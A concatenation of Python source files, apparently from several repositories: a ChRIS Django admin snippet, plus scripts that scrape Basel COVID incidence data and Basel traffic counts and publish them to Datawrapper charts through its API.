class ChrisInstanceAdmin(admin.ModelAdmin):
readonly_fields = ['creation_date', 'uuid']
list_display = ('name', 'uuid', 'job_id_prefix', 'creation_date')
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
admin.site.site_header = 'ChRIS Administration'
admin.site.site_title = 'ChRIS Admin'
admin.site.unregister(Group)
admin.site.unregister(Token)
admin.site.register(ChrisInstance, ChrisInstanceAdmin)
```
#### File: chris_backend/core/views.py
```python
from rest_framework import generics, permissions
from .models import ChrisInstance
from .serializers import ChrisInstanceSerializer
class ChrisInstanceDetail(generics.RetrieveAPIView):
"""
    A ChRIS instance view.
"""
serializer_class = ChrisInstanceSerializer
queryset = ChrisInstance.objects.all()
permission_classes = (permissions.IsAuthenticated,)
def get_object(self):
"""
        Overridden to return the ChrisInstance singleton.
"""
return ChrisInstance.load()
``` |
{
"source": "jonock/corona-bl",
"score": 3
} |
#### File: corona-bl/app/datakicker.py
```python
import pandas as pd
import webbrowser
import requests
import json
import numpy as np
from datetime import date
import time
import csv
from credentials import dwToken
# DataWrapper API Connection
def dataWrapperConnect():
print(dwToken + ' ist der Token. Erfolgreich geladen')
headers = {
'Authorization': f'Bearer {dwToken}',
}
response = requests.get('https://api.datawrapper.de/account', headers=headers)
print(response.text)
return response
def createDWChart(title="Test"):
headers = {
'Authorization': f'Bearer {dwToken}',
}
data = {
"title": title,
"type": "d3-lines"
}
response = requests.post('https://api.datawrapper.de/v3/charts', headers=headers, data=data)
resp = response.json()
print('New Chart created with id :' + resp['id'])
id = resp['id']
return id
def addDWData(id, dataimp):
headers = {
'authorization': f'Bearer {dwToken}',
'content-type': 'text/csv'
}
print(id)
print(dataimp)
    # to_csv with a path returns None, so write the file and build the upload string separately
    dataimp.to_csv(f'data/dwcharts/{id}_data.csv', index=True, encoding='utf-8')
    data = dataimp.to_csv(index=True, encoding='utf-8')
    print(repr(data))
url = f'https://api.datawrapper.de/charts/{id}/data'
# respo = requests.put(url, headers=headers, data=data)
# webbrowser.open(f'https://datawrapper.de/chart/{id}/upload')
headers = {
'authorization': f'Bearer {dwToken}'
}
# print((requests.get(url=f'https://api.datawrapper.de/v3/charts/{id}/data', headers=headers).json()))
metadata = {
'title': 'newTitleSet',
'type': 'd3-bars',
}
# response = requests.put(url = f'https://api.datawrapper.de/charts/{id}', headers=headers, data=json.dumps(metadata))
# print(response.json())
def updatedwchart(id, data, timeframe='0'):
data = data.to_csv(encoding='utf8', index=False)
url = f'https://api.datawrapper.de/v3/charts/{id}/data'
headers = {
'authorization': f'Bearer {dwToken}',
'content-type': 'text/csv; charset=utf8'
}
dataupdate = (requests.put(url=url, headers=headers, data=data.encode('utf-8')))
# Beschreibung Updaten
url = f'https://api.datawrapper.de/v3/charts/{id}'
headers = {
'authorization': f'Bearer {dwToken}'
}
if timeframe != '0':
message = 'Neuste Daten: ' + timeframe
else:
message = ''
payload = {
'metadata': {
'annotate': {
'notes': f'{message}'
}
}
}
# payload = json.dumps(payload)
description = ((requests.patch(url=url, headers=headers, json=payload)))
url = f'https://api.datawrapper.de/charts/{id}/publish'
payload = ({'json': True})
publish = (requests.post(url=url, headers=headers, json=payload))
print(publish.json())
def getChartMetadata(id):
headers = {
'authorization': f'Bearer {dwToken}'
}
metadataJson = requests.get(url=f'https://api.datawrapper.de/v3/charts/{id}', headers=headers)
metadataDict = metadataJson.json()
print('Metadaten erhalten')
return metadataDict, metadataJson
def metaDatatemp():
metadata, metadataJson = getChartMetadata('f8YHe')
pd.DataFrame.from_dict(metadata['metadata']['visualize']).to_csv('meta.csv')
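# --- Hedged usage sketch (requires a valid dwToken from credentials.py; the title and
# timeframe values below are illustrative) ---
#
#     chart_id = createDWChart('14-Tage-Inzidenz pro Gemeinde')
#     updatedwchart(chart_id, some_dataframe, timeframe='01.10.2020')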
```
#### File: corona-bl/app/main.py
```python
from selenium import webdriver
import time
from datetime import date
import os
import pandas as pd
import datakicker as dk
def getData():
chrome_options = webdriver.ChromeOptions()
downloadPath= "/Users/jonock/PycharmProjects/corona-bl/app/data"
prefs = {}
prefs["download.default_directory"]=downloadPath
prefs["profile.default_content_settings.popups"] = 0
chrome_options.add_argument('--headless')
chrome_options.binary_location = '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
chrome_options.add_experimental_option("prefs", prefs)
chromedriverpath = "/Users/jonock/PycharmProjects/corona-bl/venv/chromedriver"
driver = webdriver.Chrome(options=chrome_options, executable_path=chromedriverpath)
driver.get('https://cocontrol.bl.ch/public/dbw/209')
#driver.get('https://cocontrol.bl.ch/public/dbw/216')
driver.set_page_load_timeout(10)
#time.sleep(1)
datum = driver.find_element_by_css_selector('.highcharts-subtitle').text
python_button = driver.find_elements_by_css_selector(".highcharts-button-symbol")
python_button[0].click()
python_b = driver.find_elements_by_css_selector(".highcharts-menu-item:nth-child(5)")
python_b[0].click()
time.sleep(2)
driver.close()
return datum
def modifyData(datum):
os.rename('data/14-tage-inzidenz-pro-gemeinde.csv', modifyFilename(datum[62:].replace(')','')+ '_14d.csv'))
print('Datei umbenannt')
data = pd.read_csv(modifyFilename(datum[62:].replace(')','')+ '_14d.csv'))
base = pd.read_csv('data/bl_base.csv')
data = data.sort_values(by=['map_feature'], ignore_index=True)
aggregated = pd.concat([base,data['value']], axis=1)
filename = modifyFilename(datum[62:].replace(')','')+ '_14d_upload.csv')
aggregated.to_csv(filename, index=False)
dk.updatedwchart(id='59AH4', data=aggregated, timeframe=datum[62:].replace(')', ''))
bigtowns = pd.read_csv('data/bl_above2k.csv', index_col=0)
aggregatedbig = pd.concat([bigtowns,data['value']], axis=1, join='inner')
dk.updatedwchart(id='guadQ', data=aggregatedbig, timeframe=datum[62:].replace(')', ''))
return aggregated
def genDate():
today = date.today()
return today.strftime("%Y%m%d")
def modifyFilename(filename):
filename = './data/' + genDate() + '_' + filename
return filename
if __name__ == '__main__':
print('Starte Skript')
datum = getData()
data = modifyData(datum)
print('finito')
``` |
{
"source": "jonock/trafficbs",
"score": 3
} |
#### File: trafficbs/trafficbs/buildlinkmap.py
```python
import pandas as pd
from trafficbs import datakicker
def addMarkers(data, filename, dwid='ZOd9a'):
print(data)
admin = pd.read_csv(filename)
markers = []
for site in admin.iterrows():
print(site)
arrow = {'enabled': True}
id = site[1]['SiteCode']
bikex = {'id': 'bicycle',
'path': 'M625 700l-25-50 100-37 0-113-350 0 0 50 50 0 0 25c0 12-13 25-25 25l-125 0c-25 0-25-25-25-25l0-25 75 0 0-50-53-106c-15 3-31 6-47 6-110 0-200-89-200-200s90-200 200-200 200 90 200 200c0 0 50 0 75 0s25 25 25 25c5 74 43 131 92 169 34 26 71 42 108 50l0-52c-86-22-150-99-150-192 0-110 90-200 200-200s200 90 200 200c0 91-62 167-145 191l-55 109 0 125c0 15-12 31-25 36z m-275-250l225 0c-50-25-125-150-125-200l-58 0c-12 49-41 90-83 117z m-150-125c69 0 125-56 125-125s-56-125-125-125-125 56-125 125 56 125 125 125z m550 0c69 0 125-56 125-125s-56-125-125-125-125 56-125 125 56 125 125 125z',
'horiz-adv-x': 950, 'height': 700, 'width': 950}
bike = {'id': 'bicycle',
'path': 'M625 700l-25-50 100-37 0-113-350 0 0 50 50 0 0 25c0 12-13 25-25 25l-125 0c-25 0-25-25-25-25l0-25 75 0 0-50-53-106c-15 3-31 6-47 6-110 0-200-89-200-200s90-200 200-200 200 90 200 200c0 0 50 0 75 0s25 25 25 25c5 74 43 131 92 169 34 26 71 42 108 50l0-52c-86-22-150-99-150-192 0-110 90-200 200-200s200 90 200 200c0 91-62 167-145 191l-55 109 0 125c0 15-12 31-25 36z m-275-250l225 0c-50-25-125-150-125-200l-58 0c-12 49-41 90-83 117z m-150-125c69 0 125-56 125-125s-56-125-125-125-125 56-125 125 56 125 125 125z m550 0c69 0 125-56 125-125s-56-125-125-125-125 56-125 125 56 125 125 125z',
'horiz-adv-x': 950, }
footx = {'id': 'school',
'path': 'M638 800c-49 0-88-39-88-87s39-88 88-88 87 39 87 88-39 87-87 87z m-400-100c-49 0-88-39-88-87s39-88 88-88 87 39 87 88-39 87-87 87z m462-100c-19 0-49-7-75-25l-162-116c-45-31-4-86 37-59l106 70s70-150 44-220c-1-2-2-4-2-6l-109-291c-12-33 12-53 36-53 16 0 31 10 39 28l136 322s25-150 125-150c60 0 104 0 138 0 37 0 37 38 37 38s0 37-37 37c-25 0-88 0-113 0-53 0-50 80-50 125 0 75-50 200-50 200l150-100c45-30 85 23 41 56l-166 119c-30 22-40 25-75 25 0 0-25 0-50 0z m-525-100c-25 0-37-12-50-25l-106-106c-14-14-19-26-19-44 0-25 38-37 59-16l91 91c50 0 69-125 50-175l-75-200c-21-55 57-72 75-25l75 200s25-50 75-50l150 0c50 0 50 75 0 75l-125 0c-25 0-25 50-25 75 0 100-50 200-100 200z',
'horiz-adv-x': 1050, 'height': 700, 'width': 1050}
foot = {'id': 'school',
'path': 'M638 800c-49 0-88-39-88-87s39-88 88-88 87 39 87 88-39 87-87 87z m-400-100c-49 0-88-39-88-87s39-88 88-88 87 39 87 88-39 87-87 87z m462-100c-19 0-49-7-75-25l-162-116c-45-31-4-86 37-59l106 70s70-150 44-220c-1-2-2-4-2-6l-109-291c-12-33 12-53 36-53 16 0 31 10 39 28l136 322s25-150 125-150c60 0 104 0 138 0 37 0 37 38 37 38s0 37-37 37c-25 0-88 0-113 0-53 0-50 80-50 125 0 75-50 200-50 200l150-100c45-30 85 23 41 56l-166 119c-30 22-40 25-75 25 0 0-25 0-50 0z m-525-100c-25 0-37-12-50-25l-106-106c-14-14-19-26-19-44 0-25 38-37 59-16l91 91c50 0 69-125 50-175l-75-200c-21-55 57-72 75-25l75 200s25-50 75-50l150 0c50 0 50 75 0 75l-125 0c-25 0-25 50-25 75 0 100-50 200-100 200z',
'horiz-adv-x': 1050}
car = {'id': 'taxi-2',
'path': 'M268 243q0 37-26 63t-63 26-63-26-27-63 27-63 63-26 63 26 26 63z m20 178h567l-50 200q-1 4-8 9t-11 6h-429q-5 0-12-6t-7-9z m766-178q0 37-27 63t-63 26-63-26-26-63 26-63 63-26 63 26 27 63z m89 53v-214q0-8-5-13t-13-5h-54v-71q0-45-31-76t-76-31-76 31-31 76v71h-571v-71q0-45-31-76t-76-31-76 31-32 76v71h-53q-8 0-13 5t-5 13v214q0 52 37 89t88 36h16l58 234q13 53 58 88t100 36h429q54 0 100-36t58-88l58-234h16q52 0 88-36t37-89z',
'horiz-adv-x': 1142.9, 'height': 665, 'width': 1143}
if site[1]['title'][7:11] == 'Velo':
icon = bike
elif site[1]['title'][7:11] == 'Fuss':
icon = foot
else:
icon = car
title = site[1]['stationstring']
link = site[1]['url']
if site[1]['ignore'] != 1:
coord = site[1]['coordinates'].split(',')
coordinates = [coord[1], coord[0]]
thismarker = {'id': id, 'type': 'point', 'title': '', 'icon': icon, 'coordinates': coordinates,
'tooltip': {'enabled': True, 'text': '<a href=' + link + '>' + title + '</a>'}}
markers.append(thismarker)
print(thismarker)
data['markers'] = markers
datakicker.updateMarkers(dwid, data)
print('Neue Linkmap gebaut')
# addMarkers(data, '../chartadmin/rollingavg_3m_chartadmin.csv')
# addMarkers(data2, '../chartadmin/MIV_rollingavg_3m_chartadmin.csv', dwid='BBxPZ')
# print('Linkmap gebaut')
```
#### File: trafficbs/trafficbs/datapreps.py
```python
import numpy as np
import pandas as pd
import requests
from tqdm import tqdm
def loaddata(histdata=False, histfilename='../data/200510_download_hist.csv', filename='../data/200515_download.csv',
savename='../data/dailytotals.csv'):
if histdata:
datahist = pd.read_csv(f'{histfilename}', sep=';')
datahist = datahist.loc[(datahist['Year'] > 2016) & (datahist['Year'] < 2019)]
data = pd.read_csv(f'{filename}', sep=';')
groups = data.groupby(['SiteCode', 'Date']).agg(
{
'Total': sum,
'SiteName': 'first',
'ValuesApproved': 'last',
'TrafficType': 'first',
'Year': 'first',
'Month': 'first',
'Day': 'first',
'Weekday': 'first',
'Geo Point': 'first'
}
)
print(savename + ' abgelegt')
if histdata:
groupshist = datahist.groupby(['SiteCode', 'Date']).agg(
{
'Total': sum,
'SiteName': 'first',
'ValuesApproved': 'last',
'TrafficType': 'first',
'Year': 'first',
'Month': 'first',
'Day': 'first',
'Weekday': 'first'
}
)
groupshist['Geo Point'] = np.nan
groupreturn = pd.concat([groupshist, groups])
else:
groupreturn = groups
groupreturn = groupreturn.drop_duplicates()
groupreturn = groupreturn.sort_values(by=['Year', 'Month', 'Day'])
if histdata:
del (groupshist)
del (datahist)
del (data)
del (groups)
groupreturn.to_csv(f'{savename}')
print('fertig')
return (groupreturn)
def monthlyaverages(data):
monthlyavg = data.groupby(['SiteCode', 'Year','Month']).agg(
{
'Total': 'mean',
'SiteName': 'first',
'ValuesApproved': 'last',
'TrafficType': 'first',
'Year': 'first',
'Month': 'first',
'Day': 'first',
'Weekday': 'first',
'Geo Point': 'first'
}
)
print('monthly done')
monthlyavg.to_csv('data/monthlyavg.csv')
return (monthlyavg)
def csvpoll(bsid, filename):
url = f'https://data.bs.ch/explore/dataset/{bsid}/download/?format=csv&timezone=Europe/Berlin&lang=de&use_labels_for_header=true&csv_separator=%3B'
print('Start Download des Datensatzes ' + str(bsid))
r = requests.get(url, allow_redirects=True, stream=True)
# Progress Bar mit tqdm
total_size_in_bytes = int(r.headers.get('content-length', 0))
block_size = 1024 # 1 Kibibyte
progress_bar = tqdm(total=total_size_in_bytes, unit='iB', unit_scale=True)
with open(filename, 'wb') as file:
for data in r.iter_content(block_size):
progress_bar.update(len(data))
file.write(data)
progress_bar.close()
if total_size_in_bytes != 0 and progress_bar.n != total_size_in_bytes:
print("ERROR, something went wrong")
print('Download fertig, File schreiben')
# open(filename, 'wb').write(r.content)
print('Datei ' + filename + ' gespeichert')
# monthlyaverages(daytotals)
```
#### File: trafficbs/trafficbs/processing.py
```python
import os.path
import sys
from datetime import date
import numpy as np
import pandas as pd
from trafficbs import datakicker as dk
def normalavgWD(data):
for site in data['SiteCode'].unique():
thisdata = data.loc[data['SiteCode'] == site].copy()
thisdata['Month'] = thisdata['Month'].astype(int)
thisdata['Day'] = thisdata['Day'].astype(int)
thisdata['Month'] = thisdata['Month'].apply(lambda x: '{0:0>2}'.format(x))
thisdata['Day'] = thisdata['Day'].astype(int).apply(lambda x: '{0:0>2}'.format(x))
thisdata = thisdata.sort_values(by=['Year', 'Month', 'Day']).reset_index(drop=True)
thisdata = thisdata.loc[thisdata['Weekday'] < 5]
thisdata['rollingavg'] = thisdata['Total']
thisdata['date'] = thisdata['Year'].astype(str) + '-' + thisdata['Month'].astype(str) + '-' + thisdata[
'Day'].astype(str)
thisdata['shortdate'] = thisdata['Month'].astype(str) + '-' + thisdata['Day'].astype(str)
newdata = pd.DataFrame(columns=['counter', 'date', 'Month', 'Day', '2018', '2019', '2020'])
da2018 = pd.DataFrame(columns=['Month', 'Day', '2018'])
da2019 = pd.DataFrame(columns=['Month', 'Day', '2019'])
da2020 = pd.DataFrame(columns=['Month', 'Day', '2020'])
da2018['Month'] = thisdata.loc[thisdata['Year'] == 2018]['Month']
da2018['Day'] = thisdata.loc[thisdata['Year'] == 2018]['Day']
da2018['2018'] = thisdata.loc[thisdata['Year'] == 2018]['rollingavg']
da2018['counter'] = range(len(da2018))
da2019['Month'] = thisdata.loc[thisdata['Year'] == 2019]['Month']
da2019['Day'] = thisdata.loc[thisdata['Year'] == 2019]['Day']
da2019['2019'] = thisdata.loc[thisdata['Year'] == 2019]['rollingavg']
da2019['counter'] = range(len(da2019))
da2020['Month'] = thisdata.loc[thisdata['Year'] == 2020]['Month']
da2020['Day'] = thisdata.loc[thisdata['Year'] == 2020]['Day']
da2020['2020'] = thisdata.loc[thisdata['Year'] == 2020]['rollingavg']
da2020['date'] = thisdata.loc[thisdata['Year'] == 2020]['shortdate']
da2020['counter'] = range(len(da2020))
newdata = pd.merge(da2018[['counter', '2018']], da2019[['2019', 'counter']], how='outer',
on=['counter']).reset_index(drop=True)
newdata = pd.merge(newdata, da2020[['2020', 'counter', 'date']], how='outer', on=['counter']).reset_index(
drop=True)
# newdata = newdata.sort_values(by=['Month', 'Day'])
# da2020['date'] = da2020[['Month', 'Day']].agg('-'.join, axis=1)
# newdata = newdata.drop(columns = ['Month', 'Day'])
filestring = 'rollingavgWD_' + thisdata['TrafficType'].iloc[0] + '_' + thisdata['SiteName'].iloc[0].replace(' ',
'').replace(
'/', '')
if thisdata['TrafficType'].iloc[0] == 'Velo':
namestring = 'Anzahl ' + thisdata['TrafficType'].iloc[0] + 's bei ' + thisdata['SiteName'].iloc[0][4:]
else:
namestring = 'Anzahl ' + thisdata['TrafficType'].iloc[0] + ' bei ' + thisdata['SiteName'].iloc[0][4:]
folder = 32224
filename = '../metaconfigs/normalcorona.json'
chartadminfn = '../chartadmin/normalavg_chartadmin.csv'
updatedate = str(max(thisdata['date']))
uploadaverages(site, thisdata, newdata, filestring, namestring, folder, chartadminfn, updatedate, filename)
coronatime = newdata.loc[(newdata['counter'] > 40) & (newdata['counter'] < sum(~np.isnan(newdata['2020'])))]
folder = 32225
chartadminfn = 'normalavg_3m_chartadmin.csv'
coronatime = coronatime.drop(columns=['counter'])
filename = '../metaconfigs/normalcorona.json'
uploadaverages(site, thisdata, coronatime, filestring, namestring, folder, chartadminfn, updatedate, filename)
def rollingavgWD(data, chartadminfn='../chartadmin/rollingavg_3m_chartadmin.csv', folder=31911):
for site in data['SiteCode'].unique():
thisdata = data.loc[data['SiteCode'] == site].copy()
thisdata['Month'] = thisdata['Month'].astype(int)
thisdata['Day'] = thisdata['Day'].astype(int)
thisdata['Month'] = thisdata['Month'].apply(lambda x: '{0:0>2}'.format(x))
thisdata['Day'] = thisdata['Day'].astype(int).apply(lambda x: '{0:0>2}'.format(x))
thisdata = thisdata.sort_values(by=['Year', 'Month', 'Day']).reset_index(drop=True)
thisdata = thisdata.loc[thisdata['Weekday'] < 5]
thisdata['rollingavg'] = thisdata['Total'].rolling(3).mean()
thisdata['date'] = thisdata['Year'].astype(str) + '-' + thisdata['Month'].astype(str) + '-' + thisdata[
'Day'].astype(str)
thisdata['shortdate'] = thisdata['Month'].astype(str) + '-' + thisdata['Day'].astype(str)
newdata = pd.DataFrame(columns=['counter','date','Month', 'Day','2018', '2019', '2020'])
da2018 = pd.DataFrame(columns=['Month', 'Day', '2018'])
da2019 = pd.DataFrame(columns=['Month', 'Day', '2019'])
da2020 = pd.DataFrame(columns=['Month', 'Day', '2020'])
da2018['Month'] = thisdata.loc[thisdata['Year'] == 2018]['Month']
da2018['Day'] = thisdata.loc[thisdata['Year'] == 2018]['Day']
da2018['2018'] = thisdata.loc[thisdata['Year'] == 2018]['rollingavg']
da2018['counter'] = range(len(da2018))
da2019['Month'] = thisdata.loc[thisdata['Year'] == 2019]['Month']
da2019['Day'] = thisdata.loc[thisdata['Year'] == 2019]['Day']
da2019['2019'] = thisdata.loc[thisdata['Year'] == 2019]['rollingavg']
da2019['counter'] = range(len(da2019))
da2020['Month'] = thisdata.loc[thisdata['Year'] == 2020]['Month']
da2020['Day'] = thisdata.loc[thisdata['Year'] == 2020]['Day']
da2020['2020'] = thisdata.loc[thisdata['Year'] == 2020]['rollingavg']
da2020['date'] = thisdata.loc[thisdata['Year'] == 2020]['shortdate']
da2020['counter'] = range(len(da2020))
newdata = pd.merge(da2018[['counter', '2018']], da2019[['2019', 'counter']], how='outer',
on=['counter']).reset_index(drop=True)
newdata = pd.merge(newdata, da2020[['2020', 'counter', 'date']], how='outer', on=['counter']).reset_index(
drop=True)
# newdata = newdata.sort_values(by=['Month', 'Day'])
# da2020['date'] = da2020[['Month', 'Day']].agg('-'.join, axis=1)
# newdata = newdata.drop(columns = ['Month', 'Day'])
filestring = 'rollingavgWD_' + thisdata['TrafficType'].iloc[0] + '_' + thisdata['SiteName'].iloc[0].replace(' ',
'').replace(
'/', '')
if thisdata['TrafficType'].iloc[0] == 'Velo':
namestring = 'Anzahl ' + thisdata['TrafficType'].iloc[0] + 's bei ' + thisdata['SiteName'].iloc[0][4:]
elif thisdata['TrafficType'].iloc[0] == 'MIV':
namestring = 'MIV Verkehr bei ' + thisdata['SiteName'].iloc[0][4:]
else:
namestring = 'Anzahl ' + thisdata['TrafficType'].iloc[0] + ' bei ' + thisdata['SiteName'].iloc[0][4:]
coordinates = thisdata.loc[thisdata['Geo Point'].notna()]['Geo Point'].unique().astype(str)
stationstring = thisdata['SiteName'].iloc[0][4:]
updatedate = str(max(thisdata['date']))
coronatime = newdata.loc[(newdata['counter'] > 40) & (newdata['counter'] < sum(~np.isnan(newdata['2020'])))]
coronatime = coronatime.drop(columns=['counter'])
filename = '../metaconfigs/rollingcorona.json'
uploadaverages(site, thisdata, coronatime, filestring, namestring, folder, chartadminfn, updatedate, filename,
stationstring, coordinates)
def calendarweeks(bpdata, mivdata, ptdata):
# add calendar weeks to entries
bpdata['iso_week_number'] = bpdata.apply(
lambda x: date(int(x['Year']), int(x['Month']), int(x['Day'])).isocalendar()[1], axis=1)
mivdata['iso_week_number'] = mivdata.apply(
lambda x: date(int(x['Year']), int(x['Month']), int(x['Day'])).isocalendar()[1], axis=1)
# group by traffic type and calendar week
weekly_bp = pd.DataFrame(columns=['TrafficType', 'iso_week_number', 'Year', 'Month', 'Day', 'Total'])
weekly_bp = bpdata.groupby(['TrafficType', 'Year', 'iso_week_number']).agg(
{
'Total': 'sum',
'SiteCode': 'count',
'Month': 'first',
'Day': 'first'
}
)
# rename number of observations
weekly_bp = weekly_bp.rename(columns={'SiteCode': 'n_observations'})
# same for miv data
weekly_miv = pd.DataFrame(columns=['TrafficType', 'iso_week_number', 'Year', 'Month', 'Day', 'Total'])
weekly_miv = mivdata.groupby(['TrafficType', 'Year', 'iso_week_number']).agg(
{
'Total': 'sum',
'SiteCode': 'count',
'Month': 'first',
'Day': 'first'
}
)
# rename number of observations
weekly_miv = weekly_miv.rename(columns={'SiteCode': 'n_observations'})
# Adjust Public Transport Data
ptdata = ptdata.sort_values(by='Kalenderwoche')
ptdata['Year'] = ptdata.apply(
lambda x: int(str(x['Startdatum Woche'])[:4]), axis=1)
ptdata['Month'] = ptdata.apply(
lambda x: int(str(x['Startdatum Woche'])[5:7]), axis=1)
ptdata['Day'] = ptdata.apply(
lambda x: int(str(x['Startdatum Woche'])[8:10]), axis=1)
weekly_bp_raw = weekly_bp.copy()
weekly_miv_raw = weekly_miv.copy()
# uncertain = weekly_bp.loc[(weekly_bp['n_observations'] < 100) & (weekly_bp[ > 6]])]['n_observations']
# uncertain0 = max(uncertain)
# uncertain1 = min(weekly_bp.loc[(weekly_bp['n_observations'] < 100) & (weekly_bp.index > 6)]['n_observations'])
## Threshold anzahl observations
weekly_bp = weekly_bp.loc[weekly_bp['n_observations'] >= 100]
weekly_miv = weekly_miv.loc[weekly_miv['n_observations'] >= 180]
# relabel tables for DataWrapper upload
ptdata = ptdata.drop(columns='Startdatum Woche')
ptdata = ptdata.rename(columns={'Kalenderwoche': 'iso_week_number', 'Fahrgäste (Einsteiger)': 'Total'})
ptdata['TrafficType'] = 'BVB'
ptdata = ptdata.set_index(['TrafficType', 'Year', 'iso_week_number'])
weekly_developments_raw = pd.concat([weekly_bp_raw, weekly_miv_raw, ptdata], ignore_index=False)
weekly_developments = pd.concat([weekly_bp, weekly_miv, ptdata], ignore_index=False)
total_weekly_traffic = weekly_developments.groupby(['Year', 'iso_week_number']).agg(
{
'Total': 'sum',
'Month': 'first',
'Day': 'first'
}
)
weekly_developments_raw.to_csv('../data/weekly_totals_traffictype_raw.csv')
weekly_developments.to_csv('../data/weekly_totals_traffictype.csv')
total_weekly_traffic.to_csv('../data/weekly_total_traffic.csv')
# remove number of observations
weekly_developments = weekly_developments.drop(columns='n_observations')
weekly_miv = weekly_miv.reset_index()
weekly_bp = weekly_bp.reset_index()
ptdata = mivdata.reset_index()
weekly_developments = weekly_developments.drop(columns=['Day', 'Month'])
weekly_upload = weekly_developments.unstack(level=0)
weekly_upload = weekly_upload.reset_index()
weekly_upload = weekly_upload.iloc[:, :6]
weekly_upload.columns = weekly_upload.columns.to_flat_index()
weekly_upload.columns = ['Year', 'Wochennummer', 'BVB', 'Fussgänger', 'MIV', 'Velo']
weekly_backup = weekly_upload
weekly_upload = weekly_upload.loc[weekly_upload['Year'] == 2020]
weekly_upload = weekly_upload.loc[weekly_upload['Wochennummer'] > 6]
weekly_upload = weekly_upload.drop(columns=['Year'])
weekly_upload = weekly_upload[['Wochennummer', 'MIV', 'BVB', 'Velo', 'Fussgänger']]
weekly_upload.to_csv('../data/weekly_totals_traffictype_upload.csv', index=False)
print('Tabelle für Upload gespeichert')
dk.updatedwchart(id='Uy7qm', data=weekly_upload,
updatedate='Kalenderwoche ' + str(max(weekly_upload['Wochennummer'])), folder=31844,
title='Verkehrsmessungen Basel-Stadt')
print('Tabelle hochgeladen')
# Anpassung Wochennummer für Datawrapper
weekly_backup['Wochennummer'] = weekly_backup['Year'].astype(str) + 'W' + weekly_backup['Wochennummer'].astype(str)
weekly_velo = weekly_backup[['Year', 'Wochennummer', 'Velo']]
    weekly_velo_2020 = weekly_velo.loc[weekly_velo['Year'] == 2020].drop(columns=['Year'])
# Upload Velodate
dk.updatedwchart(id='ve91z', data=weekly_velo_2020, title='Veloverkehr Basel-Stadt 2020',
updatedate='Kalenderwoche ' + str(max(weekly_upload['Wochennummer'])), folder=31844)
dk.updatedwchart(id='ZxeOW', data=weekly_velo, title='Veloverkehr 2017 - 2020',
updatedate='Kalenderwoche ' + str(max(weekly_upload['Wochennummer'])), folder=31844)
    weekly_velo.to_csv('../data/weekly_velo.csv', index=False)
print('Velo Fertig')
#Upload MIV daten
weekly_miv = weekly_backup[['Year', 'Wochennummer', 'MIV']]
    weekly_miv_2020 = weekly_miv.loc[weekly_miv['Year'] == 2020].drop(columns=['Year'])
dk.updatedwchart(id='Qas0c', data=weekly_miv_2020, title='MIV in Basel-Stadt 2020',
updatedate='Kalenderwoche ' + str(max(weekly_upload['Wochennummer'])), folder=31844)
    weekly_velo.to_csv('../data/weekly_velo.csv', index=False)
print('MIV Fertig')
def uploadaverages(site, thisdata, newdata, filestring, namestring, folder, chartadminfn, updatedate, filename,
                   stationstring='', coordinates=0):
if os.path.exists(f'{chartadminfn}'):
charts = pd.read_csv(f'{chartadminfn}', index_col=False)
if site in charts['SiteCode'].unique():
thischart = charts.loc[charts['SiteCode'] == site].copy()
id = thischart['dwid'].iloc[0]
jsondata = dk.updatedwchart(id, newdata, title=namestring, updatedate=updatedate, folder=folder)
thischart['title'] = namestring
thischart['stationstring'] = stationstring
thischart['embedcode'] = jsondata['metadata']['publish']['embed-codes']['embed-method-responsive']
thischart['url'] = 'https://datawrapper.dwcdn.net' + jsondata['url'][10:]
if updatedate[:7] != '2020-10':
thischart['ignore'] = 1
else:
thischart['ignore'] = 0
thischart['coordinates'] = coordinates.astype(str)
dk.updatemetadata(id, filename)
charts.loc[charts['SiteCode'] == site] = thischart
print(thischart['title'].iloc[0] + ' update erfolgreich')
charts.to_csv(f'{chartadminfn}', index=False)
else:
title = namestring
id = dk.createDWChart(title)
app = {'SiteCode': site, 'dwid': id, 'title': title, 'coordinates': coordinates,
'stationstring': stationstring}
updatedate = str(max(thisdata['Date']))
dk.updatemetadata(id, filename)
jsondata = dk.updatedwchart(id, newdata, title=namestring, updatedate=updatedate, folder=folder)
app['embedcode'] = jsondata['metadata']['publish']['embed-codes']['embed-method-responsive']
app['url'] = 'https://datawrapper.dwcdn.net' + jsondata['url']
if updatedate[:7] != '2020-10':
app['ignore'] = 1
charts = charts.append(app, ignore_index=True)
print(title + f' neu erstellt {id} und in chartadmin eingetragen')
charts.to_csv(f'{chartadminfn}', index=False)
newdata.to_csv(f'../data/stations/corona_{filestring}.csv')
else:
sys.exit(f'No chartadmin file found - check if {chartadminfn} exists')
def monthlyaverages(data):
for site in data['SiteCode'].unique():
thisdata = data.loc[data['SiteCode'] == site].copy()
thisdata.sort_values(by=['Year', 'Month'])
filestring = thisdata['TrafficType'].iloc[0] + '_' + thisdata['SiteName'].iloc[0].replace(' ', '').replace('/',
'')
namestring = thisdata['TrafficType'].iloc[0] + ' - ' + thisdata['SiteName'].iloc[0][4:]
filename = '../metaconfigs/dailies.json'
if os.path.exists('../chartadmin/monthly_chartadmin.csv'):
charts = pd.read_csv('../chartadmin/monthly_chartadmin.csv', index_col=False)
if site in charts['SiteCode'].unique():
thischart = charts.loc[charts['SiteCode'] == site].copy()
id = thischart['dwid'].iloc[0]
updatedate = str(max(thisdata['Date']))
jsondata = dk.updatedwchart(id, thisdata, title=namestring, updatedate=updatedate)
dk.updatemetadata(id, filename)
print(thischart['title'].iloc[0] + ' update erfolgreich')
else:
title = namestring
id = dk.createDWChart(title)
app = {'SiteCode': site, 'dwid': id, 'title': title}
charts = charts.append(app, ignore_index = True)
print(title + f' neu erstellt {id} und in chartadmin eingetragen')
updatedate = str(max(thisdata['Date']))
dk.updatemetadata(id, filename)
jsondata = dk.updatedwchart(id,thisdata,updatedate)
print(title + ' update erfolgreich')
charts.to_csv('monthly_chartadmin.csv', index=False)
else:
sys.exit('No chartadmin file found - check if monthly_chartadmin.csv exists')
thisdata.to_csv(f'../data/stations/{filestring}.csv')
def test_monthly():
data = pd.read_csv('../data/monthlyavg.csv')
monthlyaverages(data)
def test_rolling_avg():
data = pd.read_csv('../data/dailiesnew.csv')
data2 = pd.read_csv('../data/dailies_MIV.csv')
rollingavgWD(data)
rollingavgWD(data=data2, chartadminfn='../chartadmin/MIV_rollingavg_3m_chartadmin.csv', folder=43121)
print('Abgeschlossen')
def test_daily_avg():
data = pd.read_csv('../data/dailiesnew.csv')
normalavgWD(data)
print('Abgeschlossen')
# test_rolling_avg()
# test_weekly_comparisons()
